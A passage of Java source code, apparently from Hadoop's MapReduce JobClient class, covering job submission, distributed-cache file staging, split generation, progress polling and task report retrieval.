* <li>
 *   {@link JobConf#setJobEndNotificationURI(String)} : sets up a notification
* on job-completion, thus avoiding polling.
* </li>
* </ol></p>
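 *
 * <p>For instance, option (2) above can be combined with a simple polling
 * loop over the returned {@link RunningJob} handle. The following is an
 * illustrative sketch only (exception handling omitted, variable names are
 * placeholders):</p>
 * <p><blockquote><pre>
 *     RunningJob running = jobClient.submitJob(job);
 *     while (!running.isComplete()) {
 *       Thread.sleep(5000);
 *       System.out.println("map " + running.mapProgress() +
 *                          " reduce " + running.reduceProgress());
 *     }
 *     if (!running.isSuccessful()) {
 *       System.err.println("Job failed: " + running.getFailureInfo());
 *     }
 * </pre></blockquote></p>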
*
* @see JobConf
* @see ClusterStatus
* @see Tool
* @see DistributedCache
*/
public class JobClient extends Configured implements MRConstants, Tool {
private static final Log LOG = LogFactory.getLog(JobClient.class);
public static enum TaskStatusFilter { NONE, KILLED, FAILED, SUCCEEDED, ALL }
private TaskStatusFilter taskOutputFilter = TaskStatusFilter.FAILED;
private static final long MAX_JOBPROFILE_AGE = 1000 * 2;
static{
Configuration.addDefaultResource("mapred-default.xml");
Configuration.addDefaultResource("mapred-site.xml");
}
/** The interval at which monitorAndPrintJob() prints status */
private int progMonitorPollIntervalMillis;
/** Default progMonitorPollIntervalMillis is 1000 ms. */
private static final int DEFAULT_MONITOR_POLL_INTERVAL = 1000;
/** Key in mapred-*.xml that sets progMonitorPollIntervalMillis */
static final String PROGRESS_MONITOR_POLL_INTERVAL_KEY =
"jobclient.progress.monitor.poll.interval";
/**
* A NetworkedJob is an implementation of RunningJob. It holds
* a JobProfile object to provide some info, and interacts with the
* remote service to provide certain functionality.
*/
class NetworkedJob implements RunningJob {
JobProfile profile;
JobStatus status;
long statustime;
/** The interval at which NetworkedJob.waitForCompletion() should check. */
private int completionPollIntervalMillis;
/** Default completionPollIntervalMillis is 5000 ms. */
private static final int DEFAULT_COMPLETION_POLL_INTERVAL = 5000;
/** Key in mapred-*.xml that sets completionPollInvervalMillis */
static final String COMPLETION_POLL_INTERVAL_KEY = "jobclient.completion.poll.interval";
/**
* We store a JobProfile and a timestamp for when we last
* acquired the job profile. If the job is null, then we cannot
* perform any of the tasks. The job might be null if the JobTracker
     * has completely forgotten about the job. (e.g., 24 hours after the
* job completes.)
*/
public NetworkedJob(JobStatus job) throws IOException {
this.status = job;
this.profile = jobSubmitClient.getJobProfile(job.getJobID());
this.statustime = System.currentTimeMillis();
// Set the completion poll interval from the configuration.
// Default is 5 seconds.
Configuration conf = JobClient.this.getConf();
this.completionPollIntervalMillis = conf.getInt(COMPLETION_POLL_INTERVAL_KEY,
DEFAULT_COMPLETION_POLL_INTERVAL);
if (this.completionPollIntervalMillis < 1) {
LOG.warn(COMPLETION_POLL_INTERVAL_KEY + " has been set to an invalid value; "
+ "replacing with " + DEFAULT_COMPLETION_POLL_INTERVAL);
this.completionPollIntervalMillis = DEFAULT_COMPLETION_POLL_INTERVAL;
}
}
/**
* Some methods rely on having a recent job profile object. Refresh
* it, if necessary
*/
synchronized void ensureFreshStatus() throws IOException {
if (System.currentTimeMillis() - statustime > MAX_JOBPROFILE_AGE) {
updateStatus();
}
}
/** Some methods need to update status immediately. So, refresh
* immediately
* @throws IOException
*/
synchronized void updateStatus() throws IOException {
this.status = jobSubmitClient.getJobStatus(profile.getJobID());
this.statustime = System.currentTimeMillis();
}
/**
* An identifier for the job
*/
public JobID getID() {
return profile.getJobID();
}
/** @deprecated This method is deprecated and will be removed. Applications should
* rather use {@link #getID()}.*/
@Deprecated
public String getJobID() {
return profile.getJobID().toString();
}
/**
* The user-specified job name
*/
public String getJobName() {
return profile.getJobName();
}
/**
* The name of the job file
*/
public String getJobFile() {
return profile.getJobFile();
}
/**
* A URL where the job's status can be seen
*/
public String getTrackingURL() {
return profile.getURL().toString();
}
/**
* A float between 0.0 and 1.0, indicating the % of map work
* completed.
*/
public float mapProgress() throws IOException {
ensureFreshStatus();
return status.mapProgress();
}
/**
* A float between 0.0 and 1.0, indicating the % of reduce work
* completed.
*/
public float reduceProgress() throws IOException {
ensureFreshStatus();
return status.reduceProgress();
}
/**
* A float between 0.0 and 1.0, indicating the % of cleanup work
* completed.
*/
public float cleanupProgress() throws IOException {
ensureFreshStatus();
return status.cleanupProgress();
}
/**
* A float between 0.0 and 1.0, indicating the % of setup work
* completed.
*/
public float setupProgress() throws IOException {
ensureFreshStatus();
return status.setupProgress();
}
/**
* Returns immediately whether the whole job is done yet or not.
*/
public synchronized boolean isComplete() throws IOException {
updateStatus();
return (status.getRunState() == JobStatus.SUCCEEDED ||
status.getRunState() == JobStatus.FAILED ||
status.getRunState() == JobStatus.KILLED);
}
/**
* True iff job completed successfully.
*/
public synchronized boolean isSuccessful() throws IOException {
updateStatus();
return status.getRunState() == JobStatus.SUCCEEDED;
}
/**
* Blocks until the job is finished
*/
public void waitForCompletion() throws IOException {
while (!isComplete()) {
try {
Thread.sleep(this.completionPollIntervalMillis);
} catch (InterruptedException ie) {
}
}
}
/**
* Tells the service to get the state of the current job.
*/
public synchronized int getJobState() throws IOException {
updateStatus();
return status.getRunState();
}
/**
* Tells the service to terminate the current job.
*/
public synchronized void killJob() throws IOException {
jobSubmitClient.killJob(getID());
}
/** Set the priority of the job.
* @param priority new priority of the job.
*/
public synchronized void setJobPriority(String priority)
throws IOException {
jobSubmitClient.setJobPriority(getID(), priority);
}
/**
* Kill indicated task attempt.
* @param taskId the id of the task to kill.
* @param shouldFail if true the task is failed and added to failed tasks list, otherwise
* it is just killed, w/o affecting job failure status.
*/
public synchronized void killTask(TaskAttemptID taskId, boolean shouldFail) throws IOException {
jobSubmitClient.killTask(taskId, shouldFail);
}
/** @deprecated Applications should rather use {@link #killTask(TaskAttemptID, boolean)}*/
@Deprecated
public synchronized void killTask(String taskId, boolean shouldFail) throws IOException {
killTask(TaskAttemptID.forName(taskId), shouldFail);
}
/**
* Fetch task completion events from jobtracker for this job.
*/
public synchronized TaskCompletionEvent[] getTaskCompletionEvents(
int startFrom) throws IOException{
return jobSubmitClient.getTaskCompletionEvents(
getID(), startFrom, 10);
}
/**
* Dump stats to screen
*/
@Override
public String toString() {
try {
updateStatus();
} catch (IOException e) {
}
return "Job: " + profile.getJobID() + "\n" +
"file: " + profile.getJobFile() + "\n" +
"tracking URL: " + profile.getURL() + "\n" +
"map() completion: " + status.mapProgress() + "\n" +
"reduce() completion: " + status.reduceProgress();
}
/**
* Returns the counters for this job
*/
public Counters getCounters() throws IOException {
return jobSubmitClient.getJobCounters(getID());
}
@Override
public String[] getTaskDiagnostics(TaskAttemptID id) throws IOException {
return jobSubmitClient.getTaskDiagnostics(id);
}
@Override
public String getFailureInfo() throws IOException {
      // Assuming this is called only after we have realized the job failed,
      // so we avoid an extra RPC by not calling updateStatus().
ensureFreshStatus();
return status.getFailureInfo();
}
}
private JobSubmissionProtocol jobSubmitClient;
private Path sysDir = null;
private Path stagingAreaDir = null;
private FileSystem fs = null;
private UserGroupInformation ugi;
private static final String TASKLOG_PULL_TIMEOUT_KEY =
"mapreduce.client.tasklog.timeout";
private static final int DEFAULT_TASKLOG_TIMEOUT = 60000;
static int tasklogtimeout;
/**
* Create a job client.
*/
public JobClient() {
this.progMonitorPollIntervalMillis = DEFAULT_MONITOR_POLL_INTERVAL;
}
/**
* Build a job client with the given {@link JobConf}, and connect to the
* default {@link JobTracker}.
*
* @param conf the job configuration.
* @throws IOException
*/
public JobClient(JobConf conf) throws IOException {
setConf(conf);
init(conf);
}
/**
* Connect to the default {@link JobTracker}.
* @param conf the job configuration.
* @throws IOException
*/
public void init(JobConf conf) throws IOException {
String tracker = conf.get("mapred.job.tracker", "local");
tasklogtimeout = conf.getInt(
TASKLOG_PULL_TIMEOUT_KEY, DEFAULT_TASKLOG_TIMEOUT);
this.ugi = UserGroupInformation.getCurrentUser();
if ("local".equals(tracker)) {
conf.setNumMapTasks(1);
this.jobSubmitClient = new LocalJobRunner(conf);
} else {
this.jobSubmitClient = createRPCProxy(JobTracker.getAddress(conf), conf);
}
// Read progress monitor poll interval from config. Default is 1 second.
this.progMonitorPollIntervalMillis = conf.getInt(PROGRESS_MONITOR_POLL_INTERVAL_KEY,
DEFAULT_MONITOR_POLL_INTERVAL);
if (this.progMonitorPollIntervalMillis < 1) {
LOG.warn(PROGRESS_MONITOR_POLL_INTERVAL_KEY + " has been set to an invalid value; "
+ " replacing with " + DEFAULT_MONITOR_POLL_INTERVAL);
this.progMonitorPollIntervalMillis = DEFAULT_MONITOR_POLL_INTERVAL;
}
}
private JobSubmissionProtocol createRPCProxy(InetSocketAddress addr,
Configuration conf) throws IOException {
return (JobSubmissionProtocol) RPC.getProxy(JobSubmissionProtocol.class,
JobSubmissionProtocol.versionID, addr,
UserGroupInformation.getCurrentUser(), conf,
NetUtils.getSocketFactory(conf, JobSubmissionProtocol.class));
}
/**
* Build a job client, connect to the indicated job tracker.
*
* @param jobTrackAddr the job tracker to connect to.
* @param conf configuration.
*/
public JobClient(InetSocketAddress jobTrackAddr,
Configuration conf) throws IOException {
this.ugi = UserGroupInformation.getCurrentUser();
jobSubmitClient = createRPCProxy(jobTrackAddr, conf);
}
/**
* Close the <code>JobClient</code>.
*/
public synchronized void close() throws IOException {
if (!(jobSubmitClient instanceof LocalJobRunner)) {
RPC.stopProxy(jobSubmitClient);
}
}
/**
* Get a filesystem handle. We need this to prepare jobs
* for submission to the MapReduce system.
*
* @return the filesystem handle.
* @throws IOException
*/
public synchronized FileSystem getFs() throws IOException {
if (this.fs == null) {
try {
this.fs = ugi.doAs(new PrivilegedExceptionAction<FileSystem>() {
public FileSystem run() throws IOException {
Path sysDir = getSystemDir();
return sysDir.getFileSystem(getConf());
}
});
} catch (InterruptedException e) {
throw new RuntimeException(e);
}
}
return this.fs;
}
  /** Check whether two file systems refer to the same scheme, host and port. */
private boolean compareFs(FileSystem srcFs, FileSystem destFs) {
URI srcUri = srcFs.getUri();
URI dstUri = destFs.getUri();
if (srcUri.getScheme() == null) {
return false;
}
if (!srcUri.getScheme().equals(dstUri.getScheme())) {
return false;
}
String srcHost = srcUri.getHost();
String dstHost = dstUri.getHost();
if ((srcHost != null) && (dstHost != null)) {
try {
srcHost = InetAddress.getByName(srcHost).getCanonicalHostName();
dstHost = InetAddress.getByName(dstHost).getCanonicalHostName();
} catch(UnknownHostException ue) {
return false;
}
if (!srcHost.equals(dstHost)) {
return false;
}
}
else if (srcHost == null && dstHost != null) {
return false;
}
else if (srcHost != null && dstHost == null) {
return false;
}
//check for ports
if (srcUri.getPort() != dstUri.getPort()) {
return false;
}
return true;
}
// copies a file to the jobtracker filesystem and returns the path where it
// was copied to
private Path copyRemoteFiles(FileSystem jtFs, Path parentDir,
final Path originalPath, final JobConf job, short replication)
throws IOException, InterruptedException {
    // Check whether we need to copy the files at all: if the JobTracker
    // uses the same file system (same scheme, host and port, see compareFs)
    // the original path can be used directly.
FileSystem remoteFs = null;
remoteFs = originalPath.getFileSystem(job);
if (compareFs(remoteFs, jtFs)) {
return originalPath;
}
// this might have name collisions. copy will throw an exception
//parse the original path to create new path
Path newPath = new Path(parentDir, originalPath.getName());
FileUtil.copy(remoteFs, originalPath, jtFs, newPath, false, job);
jtFs.setReplication(newPath, replication);
return newPath;
}
private URI getPathURI(Path destPath, String fragment)
throws URISyntaxException {
URI pathURI = destPath.toUri();
if (pathURI.getFragment() == null) {
if (fragment == null) {
pathURI = new URI(pathURI.toString() + "#" + destPath.getName());
} else {
pathURI = new URI(pathURI.toString() + "#" + fragment);
}
}
return pathURI;
}
/**
* configure the jobconf of the user with the command line options of
* -libjars, -files, -archives
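   * <p>For example (an illustrative invocation; the jar and file names are
   * placeholders), these options are normally passed on the command line and
   * placed into the JobConf by <code>GenericOptionsParser</code>:</p>
   * <pre>
   *   hadoop jar myjob.jar MyJob -files dict.txt -libjars extra.jar \
   *       -archives data.zip input output
   * </pre>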
* @param job the JobConf
* @param submitJobDir
* @throws IOException
*/
private void copyAndConfigureFiles(JobConf job, Path jobSubmitDir)
throws IOException, InterruptedException {
short replication = (short)job.getInt("mapred.submit.replication", 10);
copyAndConfigureFiles(job, jobSubmitDir, replication);
// Set the working directory
if (job.getWorkingDirectory() == null) {
job.setWorkingDirectory(fs.getWorkingDirectory());
}
}
private void copyAndConfigureFiles(JobConf job, Path submitJobDir,
short replication) throws IOException, InterruptedException {
if (!(job.getBoolean("mapred.used.genericoptionsparser", false))) {
LOG.warn("Use GenericOptionsParser for parsing the arguments. " +
"Applications should implement Tool for the same.");
}
// Retrieve command line arguments placed into the JobConf
// by GenericOptionsParser.
String files = job.get("tmpfiles");
String libjars = job.get("tmpjars");
String archives = job.get("tmparchives");
//
// Figure out what fs the JobTracker is using. Copy the
// job to it, under a temporary name. This allows DFS to work,
// and under the local fs also provides UNIX-like object loading
// semantics. (that is, if the job file is deleted right after
// submission, we can still run the submission to completion)
//
// Create a number of filenames in the JobTracker's fs namespace
FileSystem fs = submitJobDir.getFileSystem(job);
LOG.debug("default FileSystem: " + fs.getUri());
if (fs.exists(submitJobDir)) {
throw new IOException("Not submitting job. Job directory " + submitJobDir
+" already exists!! This is unexpected.Please check what's there in" +
" that directory");
}
submitJobDir = fs.makeQualified(submitJobDir);
submitJobDir = new Path(submitJobDir.toUri().getPath());
FsPermission mapredSysPerms = new FsPermission(JobSubmissionFiles.JOB_DIR_PERMISSION);
FileSystem.mkdirs(fs, submitJobDir, mapredSysPerms);
Path filesDir = JobSubmissionFiles.getJobDistCacheFiles(submitJobDir);
Path archivesDir = JobSubmissionFiles.getJobDistCacheArchives(submitJobDir);
Path libjarsDir = JobSubmissionFiles.getJobDistCacheLibjars(submitJobDir);
// add all the command line files/ jars and archive
// first copy them to jobtrackers filesystem
if (files != null) {
FileSystem.mkdirs(fs, filesDir, mapredSysPerms);
String[] fileArr = files.split(",");
for (String tmpFile: fileArr) {
URI tmpURI;
try {
tmpURI = new URI(tmpFile);
} catch (URISyntaxException e) {
throw new IllegalArgumentException(e);
}
Path tmp = new Path(tmpURI);
Path newPath = copyRemoteFiles(fs,filesDir, tmp, job, replication);
try {
URI pathURI = getPathURI(newPath, tmpURI.getFragment());
DistributedCache.addCacheFile(pathURI, job);
} catch(URISyntaxException ue) {
        // should not throw a URI exception
throw new IOException("Failed to create uri for " + tmpFile, ue);
}
DistributedCache.createSymlink(job);
}
}
if (libjars != null) {
FileSystem.mkdirs(fs, libjarsDir, mapredSysPerms);
String[] libjarsArr = libjars.split(",");
for (String tmpjars: libjarsArr) {
Path tmp = new Path(tmpjars);
Path newPath = copyRemoteFiles(fs, libjarsDir, tmp, job, replication);
DistributedCache.addFileToClassPath(
new Path(newPath.toUri().getPath()), job, fs);
}
}
if (archives != null) {
FileSystem.mkdirs(fs, archivesDir, mapredSysPerms);
String[] archivesArr = archives.split(",");
for (String tmpArchives: archivesArr) {
URI tmpURI;
try {
tmpURI = new URI(tmpArchives);
} catch (URISyntaxException e) {
throw new IllegalArgumentException(e);
}
Path tmp = new Path(tmpURI);
Path newPath = copyRemoteFiles(fs, archivesDir, tmp, job, replication);
try {
URI pathURI = getPathURI(newPath, tmpURI.getFragment());
DistributedCache.addCacheArchive(pathURI, job);
} catch(URISyntaxException ue) {
        // should not throw a URI exception
throw new IOException("Failed to create uri for " + tmpArchives, ue);
}
DistributedCache.createSymlink(job);
}
}
// First we check whether the cached archives and files are legal.
TrackerDistributedCacheManager.validate(job);
// set the timestamps of the archives and files
TrackerDistributedCacheManager.determineTimestamps(job);
// set the public/private visibility of the archives and files
TrackerDistributedCacheManager.determineCacheVisibilities(job);
// get DelegationTokens for cache files
TrackerDistributedCacheManager.getDelegationTokens(job,
job.getCredentials());
String originalJarPath = job.getJar();
if (originalJarPath != null) { // copy jar to JobTracker's fs
// use jar name if job is not named.
if ("".equals(job.getJobName())){
job.setJobName(new Path(originalJarPath).getName());
}
Path submitJarFile = JobSubmissionFiles.getJobJar(submitJobDir);
job.setJar(submitJarFile.toString());
fs.copyFromLocalFile(new Path(originalJarPath), submitJarFile);
fs.setReplication(submitJarFile, replication);
fs.setPermission(submitJarFile,
new FsPermission(JobSubmissionFiles.JOB_FILE_PERMISSION));
} else {
LOG.warn("No job jar file set. User classes may not be found. "+
"See JobConf(Class) or JobConf#setJar(String).");
}
}
/**
* Submit a job to the MR system.
*
* This returns a handle to the {@link RunningJob} which can be used to track
* the running-job.
*
* @param jobFile the job configuration.
* @return a handle to the {@link RunningJob} which can be used to track the
* running-job.
* @throws FileNotFoundException
* @throws InvalidJobConfException
* @throws IOException
*/
public RunningJob submitJob(String jobFile) throws FileNotFoundException,
InvalidJobConfException,
IOException {
// Load in the submitted job details
JobConf job = new JobConf(jobFile);
return submitJob(job);
}
/**
* Submit a job to the MR system.
* This returns a handle to the {@link RunningJob} which can be used to track
* the running-job.
*
* @param job the job configuration.
* @return a handle to the {@link RunningJob} which can be used to track the
* running-job.
* @throws FileNotFoundException
* @throws IOException
*/
public RunningJob submitJob(JobConf job) throws FileNotFoundException,
IOException {
try {
return submitJobInternal(job);
} catch (InterruptedException ie) {
throw new IOException("interrupted", ie);
} catch (ClassNotFoundException cnfe) {
throw new IOException("class not found", cnfe);
}
}
/**
* Internal method for submitting jobs to the system.
* @param job the configuration to submit
* @return a proxy object for the running job
* @throws FileNotFoundException
* @throws ClassNotFoundException
* @throws InterruptedException
* @throws IOException
*/
public
RunningJob submitJobInternal(final JobConf job
) throws FileNotFoundException,
ClassNotFoundException,
InterruptedException,
IOException {
/*
* configure the command line options correctly on the submitting dfs
*/
return ugi.doAs(new PrivilegedExceptionAction<RunningJob>() {
public RunningJob run() throws FileNotFoundException,
ClassNotFoundException,
InterruptedException,
IOException{
JobConf jobCopy = job;
Path jobStagingArea = JobSubmissionFiles.getStagingDir(JobClient.this,
jobCopy);
JobID jobId = jobSubmitClient.getNewJobId();
Path submitJobDir = new Path(jobStagingArea, jobId.toString());
jobCopy.set("mapreduce.job.dir", submitJobDir.toString());
JobStatus status = null;
try {
populateTokenCache(jobCopy, jobCopy.getCredentials());
copyAndConfigureFiles(jobCopy, submitJobDir);
// get delegation token for the dir
TokenCache.obtainTokensForNamenodes(jobCopy.getCredentials(),
new Path [] {submitJobDir},
jobCopy);
Path submitJobFile = JobSubmissionFiles.getJobConfPath(submitJobDir);
int reduces = jobCopy.getNumReduceTasks();
InetAddress ip = InetAddress.getLocalHost();
if (ip != null) {
job.setJobSubmitHostAddress(ip.getHostAddress());
job.setJobSubmitHostName(ip.getHostName());
}
JobContext context = new JobContext(jobCopy, jobId);
jobCopy = (JobConf)context.getConfiguration();
// Check the output specification
if (reduces == 0 ? jobCopy.getUseNewMapper() :
jobCopy.getUseNewReducer()) {
org.apache.hadoop.mapreduce.OutputFormat<?,?> output =
ReflectionUtils.newInstance(context.getOutputFormatClass(),
jobCopy);
output.checkOutputSpecs(context);
} else {
jobCopy.getOutputFormat().checkOutputSpecs(fs, jobCopy);
}
// Create the splits for the job
FileSystem fs = submitJobDir.getFileSystem(jobCopy);
LOG.debug("Creating splits at " + fs.makeQualified(submitJobDir));
/**
int maps = writeSplits(context, submitJobDir);
jobCopy.setNumMapTasks(maps);
**/
JobSubmitInfo splitInfo = getJobSplitInfo(context);
int maps = splitInfo.getSplitNum();
jobCopy.setNumMapTasks(maps);
// write "queue admins of the queue to which job is being submitted"
// to job file.
String queue = jobCopy.getQueueName();
AccessControlList acl = jobSubmitClient.getQueueAdmins(queue);
jobCopy.set(QueueManager.toFullPropertyName(queue,
QueueACL.ADMINISTER_JOBS.getAclName()), acl.getACLString());
/*
* Do not need
// Write job file to JobTracker's fs
FSDataOutputStream out =
FileSystem.create(fs, submitJobFile,
new FsPermission(JobSubmissionFiles.JOB_FILE_PERMISSION));
try {
jobCopy.writeXml(out);
} finally {
out.close();
}
//
*
*/
// Now, actually submit the job (using the submit name)
//
printTokens(jobId, jobCopy.getCredentials());
status = jobSubmitClient.submitJob(
jobId, submitJobDir.toString(), jobCopy.getCredentials(), splitInfo);
if (status != null) {
return new NetworkedJob(status);
} else {
throw new IOException("Could not launch job");
}
} finally {
if (status == null) {
LOG.info("Cleaning up the staging area " + submitJobDir);
if (fs != null && submitJobDir != null)
fs.delete(submitJobDir, true);
}
}
}
});
}
protected JobSubmitInfo getJobSplitInfo(JobContext context) throws IOException, InterruptedException, ClassNotFoundException {
JobConf conf = (JobConf)context.getConfiguration();
if(conf.getUseNewMapper()) {
List<org.apache.hadoop.mapreduce.InputSplit> splits =
ReflectionUtils.newInstance(context.getInputFormatClass(), conf).getSplits(context);
return new JobSubmitInfo(conf, splits.toArray(new org.apache.hadoop.mapreduce.InputSplit[splits.size()]));
}
else {
return new JobSubmitInfo(conf, conf.getInputFormat().getSplits(conf, conf.getNumMapTasks()));
}
}
@SuppressWarnings("unchecked")
private void printTokens(JobID jobId,
Credentials credentials) throws IOException {
if (LOG.isDebugEnabled()) {
LOG.debug("Printing tokens for job: " + jobId);
for(Token<?> token: credentials.getAllTokens()) {
if (token.getKind().toString().equals("HDFS_DELEGATION_TOKEN")) {
LOG.debug("Submitting with " +
DFSClient.stringifyToken((Token<org.apache.hadoop.hdfs.security.token.delegation.DelegationTokenIdentifier>) token));
}
}
}
}
@SuppressWarnings("unchecked")
private <T extends InputSplit>
int writeNewSplits(JobContext job, Path jobSubmitDir) throws IOException,
InterruptedException, ClassNotFoundException {
Configuration conf = job.getConfiguration();
InputFormat<?, ?> input =
ReflectionUtils.newInstance(job.getInputFormatClass(), conf);
List<InputSplit> splits = input.getSplits(job);
T[] array = (T[]) splits.toArray(new InputSplit[splits.size()]);
// sort the splits into order based on size, so that the biggest
// go first
Arrays.sort(array, new SplitComparator());
JobSplitWriter.createSplitFiles(jobSubmitDir, conf,
jobSubmitDir.getFileSystem(conf), array);
return array.length;
}
private int writeSplits(org.apache.hadoop.mapreduce.JobContext job,
Path jobSubmitDir) throws IOException,
InterruptedException, ClassNotFoundException {
JobConf jConf = (JobConf)job.getConfiguration();
int maps;
if (jConf.getUseNewMapper()) {
maps = writeNewSplits(job, jobSubmitDir);
} else {
maps = writeOldSplits(jConf, jobSubmitDir);
}
return maps;
}
  // Method to write splits for old-API mappers.
private int writeOldSplits(JobConf job, Path jobSubmitDir)
throws IOException {
org.apache.hadoop.mapred.InputSplit[] splits =
job.getInputFormat().getSplits(job, job.getNumMapTasks());
// sort the splits into order based on size, so that the biggest
// go first
Arrays.sort(splits, new Comparator<org.apache.hadoop.mapred.InputSplit>() {
public int compare(org.apache.hadoop.mapred.InputSplit a,
org.apache.hadoop.mapred.InputSplit b) {
try {
long left = a.getLength();
long right = b.getLength();
if (left == right) {
return 0;
} else if (left < right) {
return 1;
} else {
return -1;
}
} catch (IOException ie) {
throw new RuntimeException("Problem getting input split size", ie);
}
}
});
JobSplitWriter.createSplitFiles(jobSubmitDir, job,
jobSubmitDir.getFileSystem(job), splits);
return splits.length;
}
private static class SplitComparator implements Comparator<InputSplit> {
@Override
public int compare(InputSplit o1, InputSplit o2) {
try {
long len1 = o1.getLength();
long len2 = o2.getLength();
if (len1 < len2) {
return 1;
} else if (len1 == len2) {
return 0;
} else {
return -1;
}
} catch (IOException ie) {
throw new RuntimeException("exception in compare", ie);
} catch (InterruptedException ie) {
throw new RuntimeException("exception in compare", ie);
}
}
}
/**
* Checks if the job directory is clean and has all the required components
* for (re) starting the job
*/
public static boolean isJobDirValid(Path jobDirPath, FileSystem fs)
throws IOException {
FileStatus[] contents = fs.listStatus(jobDirPath);
int matchCount = 0;
if (contents != null && contents.length >=2) {
for (FileStatus status : contents) {
if ("job.xml".equals(status.getPath().getName())) {
++matchCount;
}
if ("job.split".equals(status.getPath().getName())) {
++matchCount;
}
}
if (matchCount == 2) {
return true;
}
}
return false;
}
/**
   * Get a {@link RunningJob} object to track an ongoing job. Returns
* null if the id does not correspond to any known job.
*
* @param jobid the jobid of the job.
* @return the {@link RunningJob} handle to track the job, null if the
* <code>jobid</code> doesn't correspond to any known job.
* @throws IOException
*/
public RunningJob getJob(JobID jobid) throws IOException {
JobStatus status = jobSubmitClient.getJobStatus(jobid);
if (status != null) {
return new NetworkedJob(status);
} else {
return null;
}
}
/**@deprecated Applications should rather use {@link #getJob(JobID)}.
*/
@Deprecated
public RunningJob getJob(String jobid) throws IOException {
return getJob(JobID.forName(jobid));
}
/**
* Get the information of the current state of the map tasks of a job.
*
* @param jobId the job to query.
* @return the list of all of the map tips.
* @throws IOException
*/
public TaskReport[] getMapTaskReports(JobID jobId) throws IOException {
return jobSubmitClient.getMapTaskReports(jobId);
}
/**@deprecated Applications should rather use {@link #getMapTaskReports(JobID)}*/
@Deprecated
public TaskReport[] getMapTaskReports(String jobId) throws IOException {
return getMapTaskReports(JobID.forName(jobId));
}
/**
* Get the information of the current state of the reduce tasks of a job.
*
* @param jobId the job to query.
* @return the list of all of the reduce tips.
* @throws IOException
*/
public TaskReport[] getReduceTaskReports(JobID jobId) throws IOException {
return jobSubmitClient.getReduceTaskReports(jobId);
}
/**
* Get the information of the current state of the cleanup tasks of a job.
*
* @param jobId the job to query.
* @return the list of all of the cleanup tips.
* @throws IOException
*/
public TaskReport[] getCleanupTaskReports(JobID jobId) throws IOException {
return jobSubmitClient.getCleanupTaskReports(jobId);
}
/**
* Get the information of the current state of the setup tasks of a job.
*
* @param jobId the job to query.
* @return the list of all of the setup tips.
* @throws IOException
*/
public TaskReport[] getSetupTaskReports(JobID jobId) throws IOException {
return jobSubmitClient.getSetupTaskReports(jobId);
}
/**@deprecated Applications should rather use {@link #getReduceTaskReports(JobID)}*/
@Deprecated
public TaskReport[] getReduceTaskReports(String jobId) throws IOException {
return getReduceTaskReports(JobID.forName(jobId));
}
/**
* Display the information about a job's tasks, of a particular type and
* in a particular state
*
* @param jobId the ID of the job
* @param type the type of the task (map/reduce/setup/cleanup)
* @param state the state of the task
* (pending/running/completed/failed/killed)
*/
public void displayTasks(JobID jobId, String type, String state)
throws IOException {
TaskReport[] reports = new TaskReport[0];
if (type.equals("map")) {
reports = getMapTaskReports(jobId);
} else if (type.equals("reduce")) {
reports = getReduceTaskReports(jobId);
} else if (type.equals("setup")) {
reports = getSetupTaskReports(jobId);
} else if (type.equals("cleanup")) {
reports = getCleanupTaskReports(jobId);
}
for (TaskReport report : reports) {
TIPStatus status = report.getCurrentStatus();
if ((state.equals("pending") && status ==TIPStatus.PENDING) ||
(state.equals("running") && status ==TIPStatus.RUNNING) ||
(state.equals("completed") && status == TIPStatus.COMPLETE) ||
(state.equals("failed") && status == TIPStatus.FAILED) ||
(state.equals("killed") && status == TIPStatus.KILLED)) {
printTaskAttempts(report);
}
}
}
private void printTaskAttempts(TaskReport report) {
if (report.getCurrentStatus() == TIPStatus.COMPLETE) {
System.out.println(report.getSuccessfulTaskAttempt());
} else if (report.getCurrentStatus() == TIPStatus.RUNNING) {
for (TaskAttemptID t :
report.getRunningTaskAttempts()) {
System.out.println(t);
}
}
}
/**
* Get status information about the Map-Reduce cluster.
*
* @return the status information about the Map-Reduce cluster as an object
* of {@link ClusterStatus}.
* @throws IOException
*/
public ClusterStatus getClusterStatus() throws IOException {
return getClusterStatus(false);
}
/**
* Get status information about the Map-Reduce cluster.
*
* @param detailed if true then get a detailed status including the
* tracker names and memory usage of the JobTracker
* @return the status information about the Map-Reduce cluster as an object
* of {@link ClusterStatus}.
* @throws IOException
*/
public ClusterStatus getClusterStatus(boolean detailed) throws IOException {
return jobSubmitClient.getClusterStatus(detailed);
}
/**
* Grab the jobtracker's view of the staging directory path where
* job-specific files will be placed.
*
* @return the staging directory where job-specific files are to be placed.
*/
public Path getStagingAreaDir() throws IOException {
if (stagingAreaDir == null) {
stagingAreaDir = new Path(jobSubmitClient.getStagingAreaDir());
}
return stagingAreaDir;
}
/**
* Get the jobs that are not completed and not failed.
*
* @return array of {@link JobStatus} for the running/to-be-run jobs.
* @throws IOException
*/
public JobStatus[] jobsToComplete() throws IOException {
return jobSubmitClient.jobsToComplete();
}
private static void downloadProfile(TaskCompletionEvent e
) throws IOException {
URLConnection connection =
new URL(getTaskLogURL(e.getTaskAttemptId(), e.getTaskTrackerHttp()) +
"&filter=profile").openConnection();
InputStream in = connection.getInputStream();
OutputStream out = new FileOutputStream(e.getTaskAttemptId() + ".profile");
IOUtils.copyBytes(in, out, 64 * 1024, true);
}
/**
* Get the jobs that are submitted.
*
* @return array of {@link JobStatus} for the submitted jobs.
* @throws IOException
*/
public JobStatus[] getAllJobs() throws IOException {
return jobSubmitClient.getAllJobs();
}
/**
* Utility that submits a job, then polls for progress until the job is
* complete.
*
* @param job the job configuration.
* @throws IOException if the job fails
*/
public static RunningJob runJob(JobConf job) throws IOException {
JobClient jc = new JobClient(job);
RunningJob rj = jc.submitJob(job);
try {
if (!jc.monitorAndPrintJob(job, rj)) {
LOG.info("Job Failed: " + rj.getFailureInfo());
throw new IOException("Job failed!");
}
} catch (InterruptedException ie) {
Thread.currentThread().interrupt();
}
return rj;
}
/**
* @return true if the profile parameters indicate that this is using
* hprof, which generates profile files in a particular location
* that we can retrieve to the client.
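   *
   * <p>For example, a parameter string such as the following (illustrative
   * only; the actual flags come from {@link JobConf#getProfileParams()})
   * would qualify, because it names the hprof agent and a non-empty
   * <code>file=</code> component:
   * <pre>
   *   -agentlib:hprof=cpu=samples,heap=sites,force=n,thread=y,verbose=n,file=%s
   * </pre>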
*/
private boolean shouldDownloadProfile(JobConf conf) {
// Check the argument string that was used to initialize profiling.
// If this indicates hprof and file-based output, then we're ok to
// download.
String profileParams = conf.getProfileParams();
if (null == profileParams) {
return false;
}
// Split this on whitespace.
String [] parts = profileParams.split("[ \\t]+");
// If any of these indicate hprof, and the use of output files, return true.
boolean hprofFound = false;
boolean fileFound = false;
for (String p : parts) {
